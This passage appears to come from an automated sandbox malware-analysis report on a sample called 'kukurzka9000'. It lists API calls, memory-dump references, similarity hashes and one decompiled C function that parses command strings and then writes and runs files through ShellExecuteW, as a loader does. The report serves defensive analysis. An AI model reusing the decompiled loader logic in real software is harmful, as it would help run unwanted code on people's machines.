                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 004071CF
                                                                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 004071D6
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 004071E1
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 004071EC
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 004071F8
                                                                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 004071FF
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 00407206
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000010.00000002.331137703.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000010.00000002.331335251.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_16_2_400000_kukurzka9000.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FreeLocal$ByteCharDeleteFileMultiWide$CloseHandle
                                                                                                                                                                        • String ID: 0^d$@]d$pXet$zh@
                                                                                                                                                                        • API String ID: 490209112-1499994272
                                                                                                                                                                        • Opcode ID: c8cbe69cc62f74f5a99b3f19532ac2860d420457c2f59f1cdb0e08b9d8ac2a6d
                                                                                                                                                                        • Instruction ID: f5ae4f6584a7baff5169ccf4eff2fbd10138ea77d31ce010a22c6c2769712165
                                                                                                                                                                        • Opcode Fuzzy Hash: c8cbe69cc62f74f5a99b3f19532ac2860d420457c2f59f1cdb0e08b9d8ac2a6d
                                                                                                                                                                        • Instruction Fuzzy Hash: D6E18471A00215AFEB04DFA6DD85EAEBBB5EF48310F004439FA15B7390DBB46911CB69
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,02391C89,00000000,00000000,00000000), ref: 023975C1
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,02391C89,00000000,00000000,00000000), ref: 0239764A
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,02391C89,00000000,00000000,00000000), ref: 02397651
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,02391C89,00000000,00000000,00000000), ref: 02397658
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,02391C89,00000000,00000000,00000000), ref: 02397661
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,02391C89,00000000,00000000,00000000), ref: 02397696
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,02391C89,00000000,00000000,00000000), ref: 0239769D
                                                                                                                                                                        • CloseHandle.KERNEL32(-00000004,?,?,?,?,?,02391C89,00000000,00000000), ref: 023977A4
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,02391C89,00000000,00000000), ref: 023977B3
                                                                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,?,?,?,02391C89,00000000,00000000), ref: 023977C2
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,02391C89,00000000,00000000), ref: 023977CB
                                                                                                                                                                        • LocalFree.KERNEL32(0000002F,?,?,?,?,?,02391C89,00000000,00000000), ref: 023977D4
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,02391C89,00000000,00000000), ref: 02397855
                                                                                                                                                                        • InternetSetOptionW.WININET(00000000,00000006,?,00000004), ref: 02397886
                                                                                                                                                                        • InternetSetOptionW.WININET(00000000,00000005,?,00000004), ref: 02397895
                                                                                                                                                                        • InternetCloseHandle.WININET(?), ref: 02397961
                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 0239796D
                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 02397974
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,02391C89,00000000,00000000), ref: 023979E2
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,02391C89,00000000,00000000), ref: 023979EB
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,02391C89,00000000,00000000), ref: 023979F2
                                                                                                                                                                        • LocalFree.KERNEL32(00000001,?,?,?,?,?,02391C89,00000000,00000000), ref: 023979FB
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000010.00000002.334709383.0000000002390000.00000040.00001000.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_16_2_2390000_kukurzka9000.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FreeLocal$Internet$CloseHandle$Option$DeleteFile
                                                                                                                                                                        • String ID: /$@iet$pXet
                                                                                                                                                                        • API String ID: 3877996606-309166530
                                                                                                                                                                        • Opcode ID: 44b8c5c6b5931157c93208281ed44bf5aaa786017533818b3ea69a1034d7864d
                                                                                                                                                                        • Instruction ID: 8f619e299fcdacb7fdb33d5501b0ac421cb28099b1817a686352cfe22823ce3f
                                                                                                                                                                        • Opcode Fuzzy Hash: 44b8c5c6b5931157c93208281ed44bf5aaa786017533818b3ea69a1034d7864d
                                                                                                                                                                        • Instruction Fuzzy Hash: 40028071A10215AFEF14EFA5DD45F7EB7B6EB89300F108828E905B72A0DB74AD11CB64
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 0040A503: lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,00408633), ref: 0040A516
                                                                                                                                                                          • Part of subcall function 0040A503: lstrlenW.KERNEL32(?,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A51D
                                                                                                                                                                          • Part of subcall function 0040A503: GlobalFree.KERNEL32(?), ref: 0040A550
                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 004095C6
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00409631
                                                                                                                                                                        • RegCloseKey.ADVAPI32(000F003F), ref: 0040963A
                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0040974E
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 004097D7
                                                                                                                                                                        • RegCloseKey.ADVAPI32(000F003F), ref: 004097E0
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000010.00000002.331137703.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000010.00000002.331335251.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_16_2_400000_kukurzka9000.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Close$Free$Locallstrlen$Global
                                                                                                                                                                        • String ID: %s %s$?$DisplayName$DisplayVersion$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall$pXet
                                                                                                                                                                        • API String ID: 4129056489-2265375852
                                                                                                                                                                        • Opcode ID: 0d3dbb5b45545043f816d409d6e6463967e53ce16be53e8c1f48be56fbdb61cf
                                                                                                                                                                        • Instruction ID: d80988b05da4082da03304b58d54d9122d1b9f20f569912955d0e5abbda793b7
                                                                                                                                                                        • Opcode Fuzzy Hash: 0d3dbb5b45545043f816d409d6e6463967e53ce16be53e8c1f48be56fbdb61cf
                                                                                                                                                                        • Instruction Fuzzy Hash: 60B16C71A00219BFDB05DFA6DD84EAF7BB9EF49340B104425FA05B7261D7749E10CB68
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 51%
                                                                                                                                                                        			E004073C7() {
                                                                                                                                                                        				void* _v8;
                                                                                                                                                                        				void* _v12;
                                                                                                                                                                        				void* _v16;
                                                                                                                                                                        				void* _v20;
                                                                                                                                                                        				char _v24;
                                                                                                                                                                        				void* _v28;
                                                                                                                                                                        				intOrPtr _v32;
                                                                                                                                                                        				void* __ecx;
                                                                                                                                                                        				void* _t65;
                                                                                                                                                                        				void* _t72;
                                                                                                                                                                        				void* _t79;
                                                                                                                                                                        				void* _t86;
                                                                                                                                                                        				void* _t97;
                                                                                                                                                                        				void* _t108;
                                                                                                                                                                        				void* _t122;
                                                                                                                                                                        				void* _t123;
                                                                                                                                                                        				char _t128;
                                                                                                                                                                        				void* _t137;
                                                                                                                                                                        				void* _t139;
                                                                                                                                                                        				void* _t140;
                                                                                                                                                                        				void* _t142;
                                                                                                                                                                        				void* _t144;
                                                                                                                                                                        				void* _t183;
                                                                                                                                                                        				intOrPtr _t188;
                                                                                                                                                                        				void* _t189;
                                                                                                                                                                        				void* _t190;
                                                                                                                                                                        				void* _t192;
                                                                                                                                                                        				void* _t194;
                                                                                                                                                                        				void* _t196;
                                                                                                                                                                        				void* _t198;
                                                                                                                                                                        				void* _t199;
                                                                                                                                                                        				void* _t202;
                                                                                                                                                                        				signed int _t205;
                                                                                                                                                                        				void* _t207;
                                                                                                                                                                        				signed int _t209;
                                                                                                                                                                        				void* _t211;
                                                                                                                                                                        				signed int _t213;
                                                                                                                                                                        				void* _t215;
                                                                                                                                                                        				signed int _t217;
                                                                                                                                                                        				char _t218;
                                                                                                                                                                        				void* _t219;
                                                                                                                                                                        				void* _t222;
                                                                                                                                                                        				void* _t223;
                                                                                                                                                                        
                                                                                                                                                                        				_t190 =  *((intOrPtr*)( *0x40e18c))(_t144,  *0x40e3a0, _t189);
                                                                                                                                                                        				if(_t190 == 0) {
                                                                                                                                                                        					L41:
                                                                                                                                                                        					return 0;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					while(1) {
                                                                                                                                                                        						_t192 = _t190 + 8;
                                                                                                                                                                        						_t65 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t192) + _t63);
                                                                                                                                                                        						_t137 = _t65;
                                                                                                                                                                        						_v20 = _t137;
                                                                                                                                                                        						_t202 =  *((intOrPtr*)( *0x40e18c))(_t192,  *0x40e1f0);
                                                                                                                                                                        						if(_t202 == 0) {
                                                                                                                                                                        							break;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t205 = _t202 - _t192 >> 1;
                                                                                                                                                                        						if(E0040A3E4(_t192,  &_v20, 0, _t205) == 0) {
                                                                                                                                                                        							_t137 = _v20;
                                                                                                                                                                        							break;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t194 = _t192 + _t205 * 2 + 2;
                                                                                                                                                                        						_t72 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t194) + _t70);
                                                                                                                                                                        						_t139 = _t72;
                                                                                                                                                                        						_v12 = _t139;
                                                                                                                                                                        						_t207 =  *((intOrPtr*)( *0x40e18c))(_t194,  *0x40e20c);
                                                                                                                                                                        						if(_t207 == 0) {
                                                                                                                                                                        							L36:
                                                                                                                                                                        							LocalFree(_t139);
                                                                                                                                                                        							L34:
                                                                                                                                                                        							LocalFree(_v20);
                                                                                                                                                                        							L39:
                                                                                                                                                                        							L40:
                                                                                                                                                                        							goto L41;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t209 = _t207 - _t194 >> 1;
                                                                                                                                                                        						if(E0040A3E4(_t194,  &_v12, 0, _t209) == 0) {
                                                                                                                                                                        							_t139 = _v12;
                                                                                                                                                                        							goto L36;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t196 = _t194 + _t209 * 2 + 2;
                                                                                                                                                                        						_t79 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t196) + _t77);
                                                                                                                                                                        						_t140 = _t79;
                                                                                                                                                                        						_v8 = _t140;
                                                                                                                                                                        						_t211 =  *((intOrPtr*)( *0x40e18c))(_t196,  *0x40e20c);
                                                                                                                                                                        						if(_t211 == 0) {
                                                                                                                                                                        							L33:
                                                                                                                                                                        							LocalFree(_t140);
                                                                                                                                                                        							LocalFree(_v12);
                                                                                                                                                                        							goto L34;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t213 = _t211 - _t196 >> 1;
                                                                                                                                                                        						if(E0040A3E4(_t196,  &_v8, 0, _t213) == 0) {
                                                                                                                                                                        							_t140 = _v8;
                                                                                                                                                                        							goto L33;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t198 = _t196 + _t213 * 2 + 2;
                                                                                                                                                                        						_t86 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t198) + _t84);
                                                                                                                                                                        						_t137 = _t86;
                                                                                                                                                                        						_v16 = _t137;
                                                                                                                                                                        						_t215 =  *((intOrPtr*)( *0x40e18c))(_t198,  *0x40e228);
                                                                                                                                                                        						if(_t215 == 0) {
                                                                                                                                                                        							L31:
                                                                                                                                                                        							LocalFree(_v12);
                                                                                                                                                                        							LocalFree(_v20);
                                                                                                                                                                        							L29:
                                                                                                                                                                        							break;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t217 = _t215 - _t198 >> 1;
                                                                                                                                                                        						if(E0040A3E4(_t198,  &_v16, 0, _t217) == 0) {
                                                                                                                                                                        							_t137 = _v16;
                                                                                                                                                                        							goto L31;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t15 = _t217 + 1; // 0x1
                                                                                                                                                                        						_t199 = _v20;
                                                                                                                                                                        						_v32 = _t198 + _t15 * 2;
                                                                                                                                                                        						_push(_t199);
                                                                                                                                                                        						if( *((intOrPtr*)( *0x40e074))() != 1) {
                                                                                                                                                                        							_push(_t199);
                                                                                                                                                                        							if( *((intOrPtr*)( *0x40e074))() != 2) {
                                                                                                                                                                        								_push(_t199);
                                                                                                                                                                        								if( *((intOrPtr*)( *0x40e074))() == 3) {
                                                                                                                                                                        									ShellExecuteW(0, L"open", _v16, _v12, 0, 0);
                                                                                                                                                                        								}
                                                                                                                                                                        							}
                                                                                                                                                                        							L24:
                                                                                                                                                                        							_t97 = _v8;
                                                                                                                                                                        							L25:
                                                                                                                                                                        							LocalFree(_t97);
                                                                                                                                                                        							LocalFree(_v12);
                                                                                                                                                                        							LocalFree(_t199);
                                                                                                                                                                        							LocalFree(_v16);
                                                                                                                                                                        							_t190 =  *((intOrPtr*)( *0x40e18c))(_v32,  *0x40e3a0);
                                                                                                                                                                        							if(_t190 != 0) {
                                                                                                                                                                        								continue;
                                                                                                                                                                        							}
                                                                                                                                                                        							goto L40;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t97 = _v8;
                                                                                                                                                                        						if( *_t97 != 0x25) {
                                                                                                                                                                        							goto L25;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t21 = _t97 + 2; // 0x407c02
                                                                                                                                                                        						_t218 = _t21;
                                                                                                                                                                        						_v24 = _t218;
                                                                                                                                                                        						_t108 =  *((intOrPtr*)( *0x40e044))(0x40, 0x410);
                                                                                                                                                                        						_t137 = _t108;
                                                                                                                                                                        						_v20 = _t137;
                                                                                                                                                                        						_t219 =  *((intOrPtr*)( *0x40e18c))(_t218,  *0x40e364);
                                                                                                                                                                        						if(_t219 == 0) {
                                                                                                                                                                        							L28:
                                                                                                                                                                        							LocalFree(_v8);
                                                                                                                                                                        							LocalFree(_v12);
                                                                                                                                                                        							LocalFree(_t199);
                                                                                                                                                                        							LocalFree(_v16);
                                                                                                                                                                        							goto L29;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t221 = _t219 - _v24 >> 1;
                                                                                                                                                                        						if(E0040A3E4(_v24,  &_v20, 0, _t219 - _v24 >> 1) == 0) {
                                                                                                                                                                        							_t137 = _v20;
                                                                                                                                                                        							goto L28;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t142 =  *((intOrPtr*)( *0x40e044))(0x40, 0x410);
                                                                                                                                                                        						_push(0x208);
                                                                                                                                                                        						_push(_t142);
                                                                                                                                                                        						_push(_v20);
                                                                                                                                                                        						if( *((intOrPtr*)( *0x40e15c))() != 0) {
                                                                                                                                                                        							_t222 = E0040A503(_t142, _v24 + 2 + _t221 * 2);
                                                                                                                                                                        							_t122 =  *((intOrPtr*)( *0x40e044))(0x40, 0x209);
                                                                                                                                                                        							_t183 = 8;
                                                                                                                                                                        							_t123 = E0040A05F(_t122, _t183);
                                                                                                                                                                        							_t143 = _t123;
                                                                                                                                                                        							_push(_t222);
                                                                                                                                                                        							_v28 = _t123;
                                                                                                                                                                        							if( *((short*)(_t222 +  *((intOrPtr*)( *0x40e08c))() * 2 - 2)) != 0x5c) {
                                                                                                                                                                        								_t188 =  *0x40e258; // 0x658558
                                                                                                                                                                        								_t222 = E0040A503(_t222, _t188);
                                                                                                                                                                        							}
                                                                                                                                                                        							_t142 = E0040A503(E0040A503(E0040A503(_t222, _t143), "."), _v16);
                                                                                                                                                                        							_t128 =  *0x40e374; // 0x6295b0
                                                                                                                                                                        							_v24 = _t128;
                                                                                                                                                                        							_t223 = E00408619( &_v24);
                                                                                                                                                                        							if(E00408495(_v12, _t223, _t142) != 0) {
                                                                                                                                                                        								ShellExecuteW(0, 0, _t142, 0, 0, 0);
                                                                                                                                                                        							}
                                                                                                                                                                        							LocalFree(_v28);
                                                                                                                                                                        							LocalFree(_t223);
                                                                                                                                                                        						}
                                                                                                                                                                        						LocalFree(_t142);
                                                                                                                                                                        						LocalFree(_v20);
                                                                                                                                                                        						goto L24;
                                                                                                                                                                        					}
                                                                                                                                                                        					LocalFree(_t137);
                                                                                                                                                                        					goto L39;
                                                                                                                                                                        				}
                                                                                                                                                                        			}














































                                                                                                                                                                        0x004073dc
                                                                                                                                                                        0x004073e0
                                                                                                                                                                        0x0040776a
                                                                                                                                                                        0x0040776e
                                                                                                                                                                        0x004073e6
                                                                                                                                                                        0x004073e8
                                                                                                                                                                        0x004073ed
                                                                                                                                                                        0x004073fe
                                                                                                                                                                        0x0040740c
                                                                                                                                                                        0x0040740f
                                                                                                                                                                        0x00407414
                                                                                                                                                                        0x00407418
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00407423
                                                                                                                                                                        0x00407433
                                                                                                                                                                        0x0040775e
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040775e
                                                                                                                                                                        0x00407447
                                                                                                                                                                        0x00407452
                                                                                                                                                                        0x00407460
                                                                                                                                                                        0x00407463
                                                                                                                                                                        0x00407468
                                                                                                                                                                        0x0040746c
                                                                                                                                                                        0x0040775b
                                                                                                                                                                        0x0040774d
                                                                                                                                                                        0x0040774d
                                                                                                                                                                        0x00407762
                                                                                                                                                                        0x00407762
                                                                                                                                                                        0x00407768
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00407769
                                                                                                                                                                        0x00407477
                                                                                                                                                                        0x00407487
                                                                                                                                                                        0x00407758
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00407758
                                                                                                                                                                        0x0040749b
                                                                                                                                                                        0x004074a6
                                                                                                                                                                        0x004074b4
                                                                                                                                                                        0x004074b7
                                                                                                                                                                        0x004074bc
                                                                                                                                                                        0x004074c0
                                                                                                                                                                        0x00407743
                                                                                                                                                                        0x00407744
                                                                                                                                                                        0x0040774d
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040774d
                                                                                                                                                                        0x004074cb
                                                                                                                                                                        0x004074db
                                                                                                                                                                        0x00407740
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00407740
                                                                                                                                                                        0x004074ef
                                                                                                                                                                        0x004074fa
                                                                                                                                                                        0x00407508
                                                                                                                                                                        0x0040750b
                                                                                                                                                                        0x00407510
                                                                                                                                                                        0x00407514
                                                                                                                                                                        0x00407732
                                                                                                                                                                        0x00407735
                                                                                                                                                                        0x00407727
                                                                                                                                                                        0x00407727
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00407727
                                                                                                                                                                        0x0040751f
                                                                                                                                                                        0x00407530
                                                                                                                                                                        0x0040772f
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040772f
                                                                                                                                                                        0x00407536
                                                                                                                                                                        0x0040753c
                                                                                                                                                                        0x0040753f
                                                                                                                                                                        0x00407547
                                                                                                                                                                        0x0040754d
                                                                                                                                                                        0x004076a0
                                                                                                                                                                        0x004076a6
                                                                                                                                                                        0x004076ad
                                                                                                                                                                        0x004076b3
                                                                                                                                                                        0x004076c3
                                                                                                                                                                        0x004076c3
                                                                                                                                                                        0x004076b3
                                                                                                                                                                        0x004076c9
                                                                                                                                                                        0x004076c9
                                                                                                                                                                        0x004076cc
                                                                                                                                                                        0x004076cd
                                                                                                                                                                        0x004076d6
                                                                                                                                                                        0x004076dd
                                                                                                                                                                        0x004076e6
                                                                                                                                                                        0x004076fc
                                                                                                                                                                        0x00407700
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00407706
                                                                                                                                                                        0x00407553
                                                                                                                                                                        0x0040755a
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00407560
                                                                                                                                                                        0x00407560
                                                                                                                                                                        0x0040756f
                                                                                                                                                                        0x00407572
                                                                                                                                                                        0x00407580
                                                                                                                                                                        0x00407583
                                                                                                                                                                        0x00407588
                                                                                                                                                                        0x0040758c
                                                                                                                                                                        0x0040770b
                                                                                                                                                                        0x0040770e
                                                                                                                                                                        0x00407717
                                                                                                                                                                        0x0040771e
                                                                                                                                                                        0x00407727
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00407727
                                                                                                                                                                        0x0040759b
                                                                                                                                                                        0x004075a9
                                                                                                                                                                        0x00407708
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00407708
                                                                                                                                                                        0x004075c3
                                                                                                                                                                        0x004075c5
                                                                                                                                                                        0x004075ca
                                                                                                                                                                        0x004075cb
                                                                                                                                                                        0x004075d2
                                                                                                                                                                        0x004075ee
                                                                                                                                                                        0x004075f7
                                                                                                                                                                        0x004075fb
                                                                                                                                                                        0x004075fe
                                                                                                                                                                        0x00407609
                                                                                                                                                                        0x0040760b
                                                                                                                                                                        0x0040760c
                                                                                                                                                                        0x00407617
                                                                                                                                                                        0x00407619
                                                                                                                                                                        0x00407626
                                                                                                                                                                        0x00407626
                                                                                                                                                                        0x00407647
                                                                                                                                                                        0x0040764c
                                                                                                                                                                        0x00407651
                                                                                                                                                                        0x0040765c
                                                                                                                                                                        0x00407669
                                                                                                                                                                        0x00407673
                                                                                                                                                                        0x00407673
                                                                                                                                                                        0x0040767c
                                                                                                                                                                        0x00407683
                                                                                                                                                                        0x00407683
                                                                                                                                                                        0x0040768a
                                                                                                                                                                        0x00407693
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00407693
                                                                                                                                                                        0x00407762
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00407762

                                                                                                                                                                        APIs
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,00407C00), ref: 004073FE
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,00407C00), ref: 00407762
                                                                                                                                                                          • Part of subcall function 0040A3E4: LocalAlloc.KERNEL32(00000040,00000000,?,0040870A,00000000,00000000,?,?,?,?,?,?,004079E3), ref: 0040A40C
                                                                                                                                                                          • Part of subcall function 0040A3E4: LocalFree.KERNEL32(00000000,?,0040870A,00000000,00000000,?,?,?,?,?,?,004079E3), ref: 0040A449
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,00407C00), ref: 00407452
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,00407C00), ref: 004074A6
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,00407C00), ref: 004074FA
                                                                                                                                                                        • ShellExecuteW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00407673
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,00407C00), ref: 0040767C
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,00407C00), ref: 00407683
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,00407C00), ref: 0040768A
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,00407C00), ref: 00407693
                                                                                                                                                                          • Part of subcall function 0040A503: lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,00408633), ref: 0040A516
                                                                                                                                                                          • Part of subcall function 0040A503: lstrlenW.KERNEL32(?,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A51D
                                                                                                                                                                          • Part of subcall function 0040A503: GlobalFree.KERNEL32(?), ref: 0040A550
                                                                                                                                                                        • ShellExecuteW.SHELL32(00000000,open,?,?,00000000,00000000), ref: 004076C3
                                                                                                                                                                        • LocalFree.KERNEL32(00407C00,?,?,?,?,?,?,00407C00), ref: 004076CD
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,00407C00), ref: 004076D6
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,00407C00), ref: 004076DD
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,00407C00), ref: 004076E6
                                                                                                                                                                        • LocalFree.KERNEL32(00407C00,?,?,?,?,?,?,00407C00), ref: 0040770E
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,00407C00), ref: 00407717
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,00407C00), ref: 0040771E
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,00407C00), ref: 00407727
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,00407C00), ref: 00407735
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,00407C00), ref: 00407744
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,00407C00), ref: 0040774D
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000010.00000002.331137703.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000010.00000002.331335251.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_16_2_400000_kukurzka9000.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Local$Free$Alloc$ExecuteShelllstrlen$Global
                                                                                                                                                                        • String ID: open$pXet
                                                                                                                                                                        • API String ID: 4025529775-1354807988
                                                                                                                                                                        • Opcode ID: a1c46eef3cfaacafb93fa33fc14c73831b07a4a1779f76e502dab9b557ed458a
                                                                                                                                                                        • Instruction ID: c37f464f11a496ac5bed0fa78998882daeccb467a6fdaf8c4272b4e6ddd95f6a
                                                                                                                                                                        • Opcode Fuzzy Hash: a1c46eef3cfaacafb93fa33fc14c73831b07a4a1779f76e502dab9b557ed458a
                                                                                                                                                                        • Instruction Fuzzy Hash: 54A1FA72E00215AFDB149BA6DE84D7E7BB5EB44310B004835E905F73A1DB78BD11CBAA
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 02399C12: LocalFree.KERNEL32(00000000,?,?,02391F22), ref: 02399C75
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 023963DB
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 023963E2
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 023963E9
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 02396551
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 0239673A
                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 02396743
                                                                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 0239674A
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 02396755
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 02396760
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 0239676C
                                                                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 02396773
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 0239677A
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000010.00000002.334709383.0000000002390000.00000040.00001000.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_16_2_2390000_kukurzka9000.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FreeLocal$DeleteFile$CloseHandle
                                                                                                                                                                        • String ID: 0^d$@]d$pXet
                                                                                                                                                                        • API String ID: 3365615635-3370912429
                                                                                                                                                                        • Opcode ID: 6b69802a48eb8782515909e086c02e5c0d34241564e5da442a695b2d7f20041d
                                                                                                                                                                        • Instruction ID: 2ac25aed9ca768652a74db231e28005db340100d83cf633df624fdefe286af18
                                                                                                                                                                        • Opcode Fuzzy Hash: 6b69802a48eb8782515909e086c02e5c0d34241564e5da442a695b2d7f20041d
